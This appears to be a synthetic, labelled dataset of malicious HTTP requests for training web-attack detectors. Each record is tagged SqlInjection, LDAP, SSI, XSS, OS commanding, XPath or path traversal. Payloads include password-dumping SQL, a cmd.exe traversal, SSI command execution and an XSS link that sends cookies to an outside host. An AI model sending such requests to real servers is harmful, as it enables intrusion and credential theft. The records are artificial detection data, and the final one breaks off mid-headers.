GET /mGtH8oYytad/elrMw9eur17/17K0DFMQDXgsX1/Js2pr3luscdagMyuuro.msf?exaofIhne=%3Cdiv+style++%3D++++%22++++binding%3A++++url%28%5Bhttp%3A%2F%2Fwww.ient.com%2Fscript%2Fieeepvcn.jsp%5D%29%3B+++%22++%3E HTTP/1.1
Host: 62.88.228.250
Connection: naen
Accept: application/*;q=0.3, application/*;q=0.7, image/*
Accept-Charset: x-mac-arabic, iso-8859-1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: Ohdisu='tilvl'
Client-ip: 34.160.166.92
Cookie: phmeshbesrgaa=0awde/;eep=dtadbe5vel;atesd=ct
Cookie2: $Version="13"
Date: Wed, 07 Jan 09 15:05:02 GMT
ETag: W/"dP0f@L8t3uYSaQ2"
Expect: 100-continue
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 08 Aug 04 07:26:33 UTC
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 18 May 05 07:34:58 UTC
Max-Forwards: 1686
MIME-Version: 8.0
Pragma: i='ae7uenHi'
Proxy-Authorization: Digest realm
Authorization: 7toSh afolnee=umijeoha
Range: 839-854295,-2024
Referer: http://www.efer.st/ueni1ti.jpg
TE: trailers,deflate;q=0.1,trailers
Trailer: Accept
User-Agent: cLFCkRHD http://www.cmegki.uk
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/3.2 www.ohdudahd.jpg
Transfer-Encoding: identity
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 452 www.beld.html "tgngho80ui" "Tue, 29 Jun 04 10:36:42 GMT"
X-Forwarded-For: 72.155.7.72
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48136
Start - Id: 35047
class: SqlInjection
GET /En2ojrueoS2/flhmjri/dQTfxw5rw6/LaoecasinMasdsc/a0qhGWxpU2RUU.@KSit/PrkePcLBJO0LnNn/5srhoeEHe5stgryL.asmx?h4Unls=ouQso7UKb&eursl=7%3Eela5&mqs8qa=cgl&zirngsmta9rgc=e9Mebvf%408juY&PTDaikGprocessing-instruction=ezEmEkanoTeeoul&CMEwH649z=pwqoe4phpU9en%3Biupg&yevalEnetcat=bulk+++++insert+++nyTNrs+++from+%27pwdump.exe%27+++++with++++%28codepage%3D%27RAW%27++%29 HTTP/1.1
Host: www.uoa2w.net:0400
Connection: oaebas
Accept: audio/x-wav
Accept-Charset: windows-1257;q=0.1
Accept-Encoding: 
Accept-Language: o-hct;q=0.5
Cache-Control: max-age=76
Client-ip: 175.67.198.190
Cookie: EvLMMHU=l]sf;;imNriiwhesotdh= -;eao=cpinsertecho4;hYmNnata7oidbg= perl/c;homhYohi3r=aotAeijeseso;9ljb7=:
Cookie2: $Version="16"
Date: Thu, 07 Jul 05 05:55:44 UTC
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Tue, 20 Nov 07 01:25:19 CET
If-Unmodified-Since: Sun, 09 Jul 06 21:21:06 CET
If-Match: *
If-None-Match: "7Z09NXqUDs-e29Ky37K4"
If-Range: "sJgoAZjc8z8NEx880"
Max-Forwards: 519
MIME-Version: 0.3
Pragma: oif=xihioe
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: Basic U2FvdTh0bnQ6dnIyZU5p
Range: -373777
Referer: /dhhSsa/ndos/131elnhr/cniadjn4/Osyidd.cfm
TE: chunked
User-Agent: j7yWKJBBrZ http://www.rplnuFcr.st
UA-CPU: StrongARM
UA-Color: color16
Via: 9.3 39.65.86.77
Transfer-Encoding: compress
Upgrade: ntza0i/5.5
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35047
Start - Id: 37558
class: LdapInjection
PUT /44CRCvt7iKBGtHdd6AG/positionh8L5K0SCm98Rej/rkK8f4vqfQ/todleemtbb7Tijg4ot/mte0/6MdIlink/4gqL/brusede.jpg? HTTP/1.1
Content-Length: 159
Content-Language: tnEGu,3g
Content-Encoding: compress
Content-Location: /eeau/s0tc6ma.doc
Content-MD5: bmkwcHdyZGxldDhwZG5lOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 04:09:46 CET
Last-Modified: Sun, 03 Jun 07 03:02:09 CET
Host: 92.34.131.187
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 220.10.155.240
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="00"
Date: Mon, 01 Sep 08 03:49:51 UTC
ETag: "CiFBiQN6uzs39biv-lXG"
Expect: ontekast
From: oenu@5hnawusete.de
If-Modified-Since: Sun, 16 Jan 05 05:26:35 GMT
If-Unmodified-Since: Tue, 09 Nov 04 03:04:38 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "w5qO6lXigKlPybS3TT3"
If-Range: *
Max-Forwards: 1024
MIME-Version: 7.0
Pragma: ncno='k'
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: Basic Y2pnTjpzZWFTdw==
Range: -78728,9752-,0169-21
Referer: /NiiiRt/82sbpi/MD9eem/esarhqhm/ms9aelti.mdb
TE: deflate
Trailer: If-None-Match
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 5.5; We-hu; rv:8.6.6) Gecko/42230309
UA-CPU: MIPS
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1680x065
Via: 7.5 www.isna.png:1886, 2.8 www.3mnbaFud.htm:2142, HTTP/2.3 136.81.171.230
Transfer-Encoding: tireo
Upgrade: etMr/2.7
Warning: 777 61.25.244.156 "slsrthrpoh" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

toew=4329)(&(objectClass=ba8)(|(sn   =  to)(cn=o2   J*))&izeus6h=9HmfCRS&7IzomochalupCz8f=8&nggfStt6ob3Rb=05763&btetiiEar=Imo|a

End - Id: 37558
Start - Id: 37510
class: LdapInjection
POST /4DIk/btot1h/rHlocation-uQtmpT2VT/rCFS-ngbT7iM/Gx5fq.2fi@MnQe/He1Vcnd/FZpositionlz6-telnetyets/rMdJz8/9fzfai/0JF9eNIZS/iXjyT@WZqNlfU/dfoei6.tiff? HTTP/1.0
Content-Length: 270
Content-Language: pwn92a,at
Content-Encoding: identity
Content-Location: http://www.dpee3t.org/nvshoaE/w6een4.pl
Content-MD5: RUlubGFlQzRpYWNhVGhybA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Aug 06 04:01:13 UTC
Last-Modified: Mon, 18 Apr 05 15:28:12 UTC
Host: www.r2ervheg4D.uk:80
Connection: tehnO
Accept: */*
Accept-Charset: iso-8859-8;q=0.1, iso-8859-3, windows-1252;q=0.4
Accept-Encoding: 
Accept-Language: tehfdh-mf;q=0.8
Cache-Control: only-if-cached
Client-ip: 56.86.55.164
Cookie: weLjorsgo=650;o2y1t=1131;7ttfNarfditI=3781683;lxsaytth45=h0iufTnoeeocr3vuRs;IeocsgraEff=Ia8eEssNheem0ori;C7dprma=51024
Cookie2: $Version="089"
Date: Tue, 09 Dec 08 06:44:38 CET
ETag: "DVOl143jke2PWR-a"
From: t7in1r0e@I35dntt6be.fr
If-Modified-Since: Tue, 15 Aug 06 02:26:44 UTC
If-Unmodified-Since: Sat, 16 Jan 10 09:05:33 GMT
If-Match: "ar8QVUgQ@SeGJAlvZ634"
If-None-Match: *
If-Range: Sun, 03 Oct 04 03:29:53 CET
Max-Forwards: 1330
MIME-Version: 0.6
Pragma: mbfulq=satadsm
Proxy-Authorization: NTLM ZWhhbmV5ZGJxbm5vbm1lYWlzamVnbWUwdXRoaHBpZm90dHRzb2lyZG4=
Authorization: Basic b2xvbDQ6b2Vnc25I
Referer: /hfbremH/IywgrGn/2nnt.mp3
TE: trailers
Trailer: Expect
User-Agent: Mozilla/0.4 (Windows; U; WinNT 4.2; la-ym; rv:9.1.1) Gecko/66845770
UA-Pixels: 2665x9772
Transfer-Encoding: deflate
Warning: 173 www.uucurht.tiff:45369 "maaas3dCteAprn" 
X-Serial-Number: 4606842395290054569

viDsr=2lCR55&sooUzlRt0Oi=0&uGIBhDexecV=)   (  | (displayName=had*)  (name    =  had*   )(mail=had*)&oxiTueernte=benimjuziteld4irtt&aHia7ae7n8awol=330823528&P_VbwxMoO-q=mnattoechotelnetacneo&c7ulne=gj qgeemefrom4ire9&iofsd5rrliIzbg=5e&wld=23958883

End - Id: 37510
Start - Id: 40913
class: SSI
GET /hcmpm6N-/passthruHMTZgHe/75eixlIgiiHLhafoit/IuhPn5MxtermUVysDiY.tiff?eIoeyue9s=iicalhte&epn=723072&trbxstrsonsnri=%28Da%40icvjtt&xhobjectaAuvarCkzV=6&so=%3C%21--+%23odbc++++connect%3D%22sh%2CfKo%2Cwdez%22+++++statement%3D%22select+*+from++tnn%22--%3E&afimitebLm=26377322&DvuQNV=idv.rid&dftnrmtirarEfsa=Rn3hibort&wt6SdpgEsaysah=riidaaaB HTTP/1.0
Host: www.rtnr9sl.uk:80
Connection: close
Accept: audio/*;q=0.0, image/*
Accept-Charset: x-mac-hebrew;q=0.9, iso-8859-8;q=0.5, iso-2022-jp, hz-gb-2312, windows-1252
Accept-Encoding: 
Accept-Language: 8o3be-sfouUea;q=0.5, aleeul6t-tihatt
Cache-Control: max-stale
Client-ip: 107.204.228.141
Cookie: 3RfB=cOw
Cookie2: $Version="3"
Date: Mon, 20 Dec 04 16:18:14 UTC
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: 7tnz7e@rrkue5aod.it
If-Modified-Since: Wed, 20 Jul 05 09:15:09 CET
If-Unmodified-Since: Fri, 16 Apr 04 18:51:20 GMT
If-Match: *
If-None-Match: "PSEzn77E@@YPz-fz"
If-Range: *
Max-Forwards: 52
MIME-Version: 9.9
Pragma: rdtrc='tnsz'
Authorization: Digest algorithm=MD5
Range: 518194-7
Referer: /df0Clrds/YehtPv/fenrCiqm.mpg
TE: trailers
Trailer: Accept-Encoding
User-Agent: ntus4hPtuscetc6eo
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color32
Via: 9.3 www.reeFohso.htm, 5.5 202.245.151.136:220
Transfer-Encoding: compress
Upgrade: kcyy9d/1.4, eeteeD/7.1, tfel/6.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: ------------------

null

End - Id: 40913
Start - Id: 35327
class: SqlInjection
GET /drY.BC/sUiSdN6W4f.js?npBphseIom=h1vo40&1btrlTiedsm=%7Emc%3Aasnullhttpti+8pu&hin=select++++h9tSctm++++from+ALL_USERS&aqetb=25807230&9hhhtsQoorewht=322585899&2Ftenppxq2rnIS=szIraNstn&easfi6=ms1QaSEi HTTP/1.0
Host: www.pkdi.st
Connection: close
Accept: */*
Accept-Charset: euc-jp;q=0.6, windows-1252
Accept-Encoding: *
Accept-Language: pdl1et-3a, thehb-atn, m27y-sppsnz;q=0.7, sc0kN-el7eono;q=0.9
Cache-Control: no-cache
Client-ip: 26.173.42.23
Cookie: 7replace8D3N=o+g@lbgsound';glXxih=eDDwJ;te=aNAyCrIdxDI
Cookie2: $Version="54"
Date: Sat, 24 Nov 07 14:11:13 CET
ETag: "-1ukDA-pz9i_RiM"
Expect: 100-continue
From: bEvfTsnh@Bj08etuio.cz
If-Modified-Since: Sat, 08 Apr 06 07:01:43 CET
If-Unmodified-Since: Mon, 08 Dec 08 19:59:25 GMT
If-Match: *
If-None-Match: *
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 61
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: Basic VUVtdDplZWF2aGU=
Range: -699332,-7572
Referer: /eapye/24rw/asmtv.asp
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.7 (compatible; MSIE 7.2; SunOS sun4u; nHeoj14; csitpnk)
UA-CPU: StrongARM
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: FTP/4.0 26.109.203.24, FTP/4.7 www.ehLeeM.js, zyd/0.2 www.heeeeco.gif
Transfer-Encoding: deaz
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 865 www.h4qht.jpg "obrm0egc9usiwSs" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 246484
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35327
Start - Id: 44132
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.aQen9hd.cz
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-age=1769
Client-ip: 139.133.159.204
Cookie: oydlrjesem=mOnvar;otNrl6=on@;DRE5xFstyled=svogTmoaehoaoskn;dlr7r6icyrqmT=p.w02b6;yiesqwi=tlty>Euhtwi36t
Cookie2: $Version="549"
Date: Tue, 04 May 04 03:28:12 CET
ETag: "G3tMuf5X5f@OyB7Fh"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Tue, 07 Sep 04 03:57:55 GMT
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "cDbyYOpWDU8CZza7j"
If-None-Match: "g7kjAO.mdCIZ6lHv0p"
If-Range: "K1LqRt.C3aG.OYscEtx"
Max-Forwards: 750
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: 14nnle i0nornu3=tmoIce
Range: 2856-325921,765830-7785,3752-597
Referer: http://www.rred.com/3epaosh/eeidriSt/zEgo6n.wmn
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.3 (Windows; U; Win98 2.2; et-ha; rv:9.2.2) Gecko/74502869
UA-CPU: 68000
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: compress
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 051 11.28.159.211 "vuojxaosel7oelrcfSe" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44132
Start - Id: 40033
class: SSI
GET /nO@eYzId6d/eda5gerxeXIAiwh/ar3oApneeethIhetyai/n1sqeislrtzNlvatiaa/st0Mj.jpeg?38lartt=1613&h7bfwopyyleuias=77&tierrs1zhuvers=87&hrodd8=17068315&wsl44ehdzqSOio=90276568&er0tsoiaIB=etf18ouoin&aedGn=7&omwljIhfs=4499&nOioLeaihhean=7twmsef&sii0ahtaarH8E0e=%3C%21++%23%3C%21--+++++%23exec+++++cmd%3D%22id%22--%3E&oxn=360990200&rqohqierli2E=3etue2no&oeiqHn=45905944&iasieaueToa5ewr=1093187445 HTTP/1.1
Host: www.ti4nst.cz
Connection: 1ayiut
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 160.214.20.200
Cookie: denuaajnNhmzm=insertar1zgdntRNi 7ed;7c0Ua0msifzCji=htE ;in=432253
Cookie2: $Version="286"
Date: Fri, 01 Sep 06 14:53:49 CET
ETag: "1oi95JajISSvSc6NmwV"
Expect: 100-continue
From: aeeonEt@aorvilavl.de
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Sun, 02 Aug 09 24:28:10 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Feb 06 08:22:34 UTC
Max-Forwards: 02
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest username="tsbedo"
Authorization: oSary tpnt=cjNb5ce
Range: 41683-1312,-3
Referer: http://oohln.gov/ql9xl8e/lffapa/wsphsa/Asil.sh
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: 60luauYw
UA-CPU: MIPS
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: compress
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40033
Start - Id: 40243
class: SSI
GET /eu/hdtr1t/yiresbuwazTsttaee9sS.asp?D0Mzstyle=rteae7mht&Eante=re%3Fsaccepth&hjpenPpternr=fromhk%3B&BTOjx=eDumrtmeyksefr&iNearO=601078341&heii=oNa&stoohuigpetaoQ=eeedcohtSyht&7j6waR=rim&tr5li=27329&Os9afsbxuls=hIFiMzfWRfd2&snajnttmstN=tai7tmp+oi&DXlf-O7g=54640&FNmUQQaShI-=e HTTP/1.0
Host: www.8xrok3tn.com:80
Connection: oorr
Accept: audio/basic;q=0.3, audio/x-wav
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: qkibefi-iemtyl4;q=0.8
Cookie: s2Se=ave;hRL8Tyrcleeeong=<!--#exec    cmd="c:\progra~1\ileeJ\DMsaUtsmo\mihilIl.exe d:\oDrsfnehaf\www.taselise.org\haaun\database.mdb  /x     exporttofoxpro"-->;5rt=689520;6nmilangte=ide e;fdnGceoye=8380678159
Date: Sun, 01 Feb 09 13:32:48 CET
From: oeDT@ad8cw09.biz
If-Modified-Since: Fri, 26 May 06 23:44:41 UTC
Max-Forwards: 3877
MIME-Version: 8.7
Pragma: no-cache
Referer: /ylYwhs/tfo7.asp
User-Agent: oeqnsssgseSbsen9ele
UA-Color: color16

null

End - Id: 40243
Start - Id: 42117
class: SqlInjection
GET /tis4/neecona3f7lecgrrndtc/r5EZL70xB/KSgZZ2ZRi/cWg4_qjc-NXUC83eYZ/iadminfQB_s/siEjs.lCU.htm?s5osZnahai=%27%3B++++begin++declare+%40ret+++++varchar%288000%29++set++%40ret%3D%27%3A%27+select++%40ret%3D%40ret%2B%27+++++%27%2Bephi%2B%27%2F%27%2Bpassword++++from+aoM0tb+++where++eel%3E%40ret+++++select++++%40ret++as++ret+++++into+++foo+++end--&bldteittrtb9o=80882979&_qmUp2PDIC=wa%26+&mkewerRmllmtrm=49145267&3_stdinHBP=p2y&sUghi7ECt=oo9e6 HTTP/1.1
Host: 75.5.144.160:80
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: moevros=do
Client-ip: 123.133.143.196
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="353"
Date: Fri, 02 Jun 06 17:42:45 CET
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: jqr1h@steT4irua.uk
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Sat, 14 Apr 07 05:19:04 CET
If-Match: "@25fmCZ8gz2f@E_bMJ"
If-None-Match: "EFDCd3IKj7.--jOC"
If-Range: Sun, 14 Jun 09 17:42:16 UTC
Max-Forwards: 0
MIME-Version: 7.0
Pragma: ej5Q=wnota
Proxy-Authorization: Basic ZXZ0b25hczpyd2VpZQ==
Authorization: Digest realm
Range: 80-3804,023297-91,09-
Referer: /hnxeethr/I9ih.php
TE: gzip,trailers,gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: 79BHKoY7VZ http://www.wiitn.st
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 051x7587
Via: dto/9.8 www.nggan.jpeg:808, 1.1 164.60.70.204, 7.9 159.129.86.145
Transfer-Encoding: identity
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42117
Start - Id: 35743
class: XPathInjection
GET /LunionH9JV.0htpasslincludegroup byV/sXHPQQByXj@YnCn9z/f00rto2Ertsqhe0sh/ssnLstye/wHWE9.xplBIIYJq/raEneaEna1onEe/rPVZv4ni2HDam7g2.swf?tl06eona2OToAo=XesSc&egreeh=hwATgwithost&SboOao=6344&ueanlyes9rul=546++or+++1%3C+++Tttu%2Feetn0m%2Fi8ao6t%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D20%5D+or+840%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&4oliar9tth=a%28ut3oeotieev+esock_streamoi HTTP/1.1
Host: 65.103.54.204:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, identity;q=0.9, deflate;q=0.8, compress, deflate;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 174.178.95.52
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="4"
Date: Mon, 05 Dec 05 02:13:58 CET
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: 7mrzro1@lUne0jie.it
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: "gAzTgAbOGl8BwEygsuuQ"
If-None-Match: *
If-Range: *
Max-Forwards: 662
MIME-Version: 5.0
Pragma: eild=oOcba
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest nonce
Range: 820401-
Referer: /L5xsdir/w8ritad/ts5klsne/h8knn.gz
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: mEEiovqt
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: p6rrya/2.8 39.65.133.242
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 4305096438524037
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35743
Start - Id: 47525
class: XSS
GET /tuAmO6qfkuPhGf@1uOXI/igRaej/dzv.ww6GY/37CKajezc./1er5hBS9n/Nzwt/dpM8jkp/q2NIy7o.o6/eseRars/i7flc.jpg?wfasAhddfeU=30&dIU_autoexecI=i&udnel=u3ol2o&tbe3gs8ab=snadminZoi7ea&98HKBVu3i7W8=23900&t9xwsdnse=XlEerhstAntkiEr&thetgvysiaRO7ea=tv74-hKdKJWc&oet=a2ebgsoundr&RU_7Exe=+eaEZemtS&upamso=e%5C9&snocnNuki=%3Ca+href%3D%22+javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.mane.com%2Fcgi-bin%2Fmesees.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E HTTP/1.1
Host: 116.102.186.224:80
Connection: ista
Accept: audio/x-wav, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 2.40.61.206
Cookie: GV2iVo=32399957;aAidr0y=1871713;passwdG7DRMQMsamxp_cb=47;mfabrnt3s= tswinntr'l;.ERUcfX=16948
Cookie2: $Version="545"
Date: Thu, 26 Feb 04 07:22:01 GMT
ETag: W/"-gXHqWTuyFHb9trO"
Expect: mAnknsm
From: eieolton@oosl.de
If-Modified-Since: Thu, 23 Feb 06 15:12:57 GMT
If-Unmodified-Since: Sat, 05 Jun 04 11:38:47 GMT
If-Match: *
If-None-Match: *
If-Range: "xsSLm8RVhjdXiTs"
Max-Forwards: 822
MIME-Version: 0.2
Pragma: itb=s
Proxy-Authorization: Basic RWhzaWU6b05ub2U=
Authorization: NTLM dktmdHRSaXl1OGNtaWF0bGV0Z0Fzc3hvcm9SdXc5T3Q=
Range: 924-,916951-
Referer: http://www.dnee4.gov/2nl9h/opfgtdec/esCieuwg/htcjw.png
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: t_cr70H http://www.tcAsf.uk
UA-CPU: PowerPC
UA-Disp: 0811,223,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: FTP/9.2 www.ouanydi.gif, HTTP/5.7 www.estaGi.tiff
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 781 255.112.125.38 "ehmjCimcbjUud9qrtdru" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47525
Start - Id: 40535
class: SSI
GET /nleI/4eB/ebpsoihi07abrhr/10/tIIRsBfVrGJq_/qqmdVcatsock_streamRYhV/7AvS_s3connectURRouq.aspx?izilo=c%3D&LWwgetP=s+a2a&acE=siilnihe&Z.m3je7=%3C%21--++++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&xakdgo4o=tW9%40&istig4a=ctmpr%3Di HTTP/1.0
Host: 39.233.151.147
Connection: close
Accept: text/xml, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: Ehttiiv-6, boe2id-tb;q=0.6, ueGSayee-cRnAeaik, y6ea-zaE73o5d;q=0.3
Cache-Control: no-transform
Client-ip: 233.63.57.74
Cookie: zqb=c_IX;ichfmCdrcfX=aUbBq;Mh0tmp=mtla;1L35DDkS=tFU6n.N-QY;fkod5=%uaIoj;ktysDe5Oi=e(mia
Cookie2: $Version="326"
Date: Sun, 07 Sep 08 24:53:17 CET
ETag: "AfcdCSnakAcyeEBs"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Mon, 22 Nov 04 21:51:32 CET
If-Unmodified-Since: Thu, 06 Aug 09 24:01:04 GMT
If-Match: "qV-cYVjAGKbV-yPpeMju"
If-None-Match: *
If-Range: *
Max-Forwards: 00
MIME-Version: 7.8
Pragma: iar3d4st='Nkioue'
Proxy-Authorization: NTLM OXJ3bGd1ZWFnZWVTbnRzMHhpT3dlYmI2bzZweXR0TGY=
Authorization: gopleT 27c7o=rerz30S
Range: -52,238-2637
Referer: /nhAaNeTt/n7eT/tpOnfeA/ie1Eeeg.fgf
TE: trailers
Trailer: Referer
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 6.8; hl-eg; rv:3.5.3) Gecko/62143117
UA-CPU: MIPS
UA-Disp: 5432,6298,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1008x858
Via: HTTP/9.3 www.ugthb.js, FTP/3.1 190.32.191.7
Transfer-Encoding: compress
Upgrade: ttRtgh/5.0, upo/8.3, 1a4/1.5, lamere/3.4
Warning: 938 248.40.128.148 "sur0lis0nzeta4oe" "Sun, 25 Apr 04 08:25:21 UTC"
X-Forwarded-For: 70.253.19.118
X-Serial-Number: 61054598804485092045
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40535
Start - Id: 44863
class: PathTransversal
GET /dyEaq/eu727ZKBPYQrCz1nudhH/swzoAuPwyTn1PHCAfs/htetCocieeeosozcu8e/robjectlIn.E-aV/ojnmgd.a/rihanSstbepNsf/h-v5l1documentT-/Y8cperlpk@_ir4/9Rqddm0kI8OjquX@Zb/eogbs9Hi3soEebaow6e7/cmocha5sock_stream6IR-yivmv.sh?ea=collection%28+file%3A%2F%2F%2Fc%3A%2Fe1%2FaEf7lam.xml+%29&@yz9up=n3iMmv2_8 HTTP/1.0
Host: 55.223.228.167
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: 2me-jn35ystb, hsol0-w, prtoo5-eo;q=0.8
Cache-Control: no-transform
Client-ip: 31.199.198.5
Cookie: UimOtoYnIe=n1;Esct=98722;fpeioidrtTrrh=ce6cvarnywget;Ieawindow.open=shutdown+9rt
Cookie2: $Version="27"
Date: Tue, 16 Mar 10 22:37:37 GMT
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: 100-continue
From: netotmi@oanhTettwr.cz
If-Modified-Since: Tue, 26 Jan 10 13:25:40 CET
If-Unmodified-Since: Sun, 07 Mar 04 02:40:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4993
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: boirwt l8nta=oels3is
Authorization: Basic bmdwbzpjc3RMbWU=
Range: 3752-,303-8,-33345
Referer: /ohhmeGul/wusnr/oe25ift/Wlhi7em/efsjeoLt.php3
TE: deflate,deflate,chunked
Trailer: Date
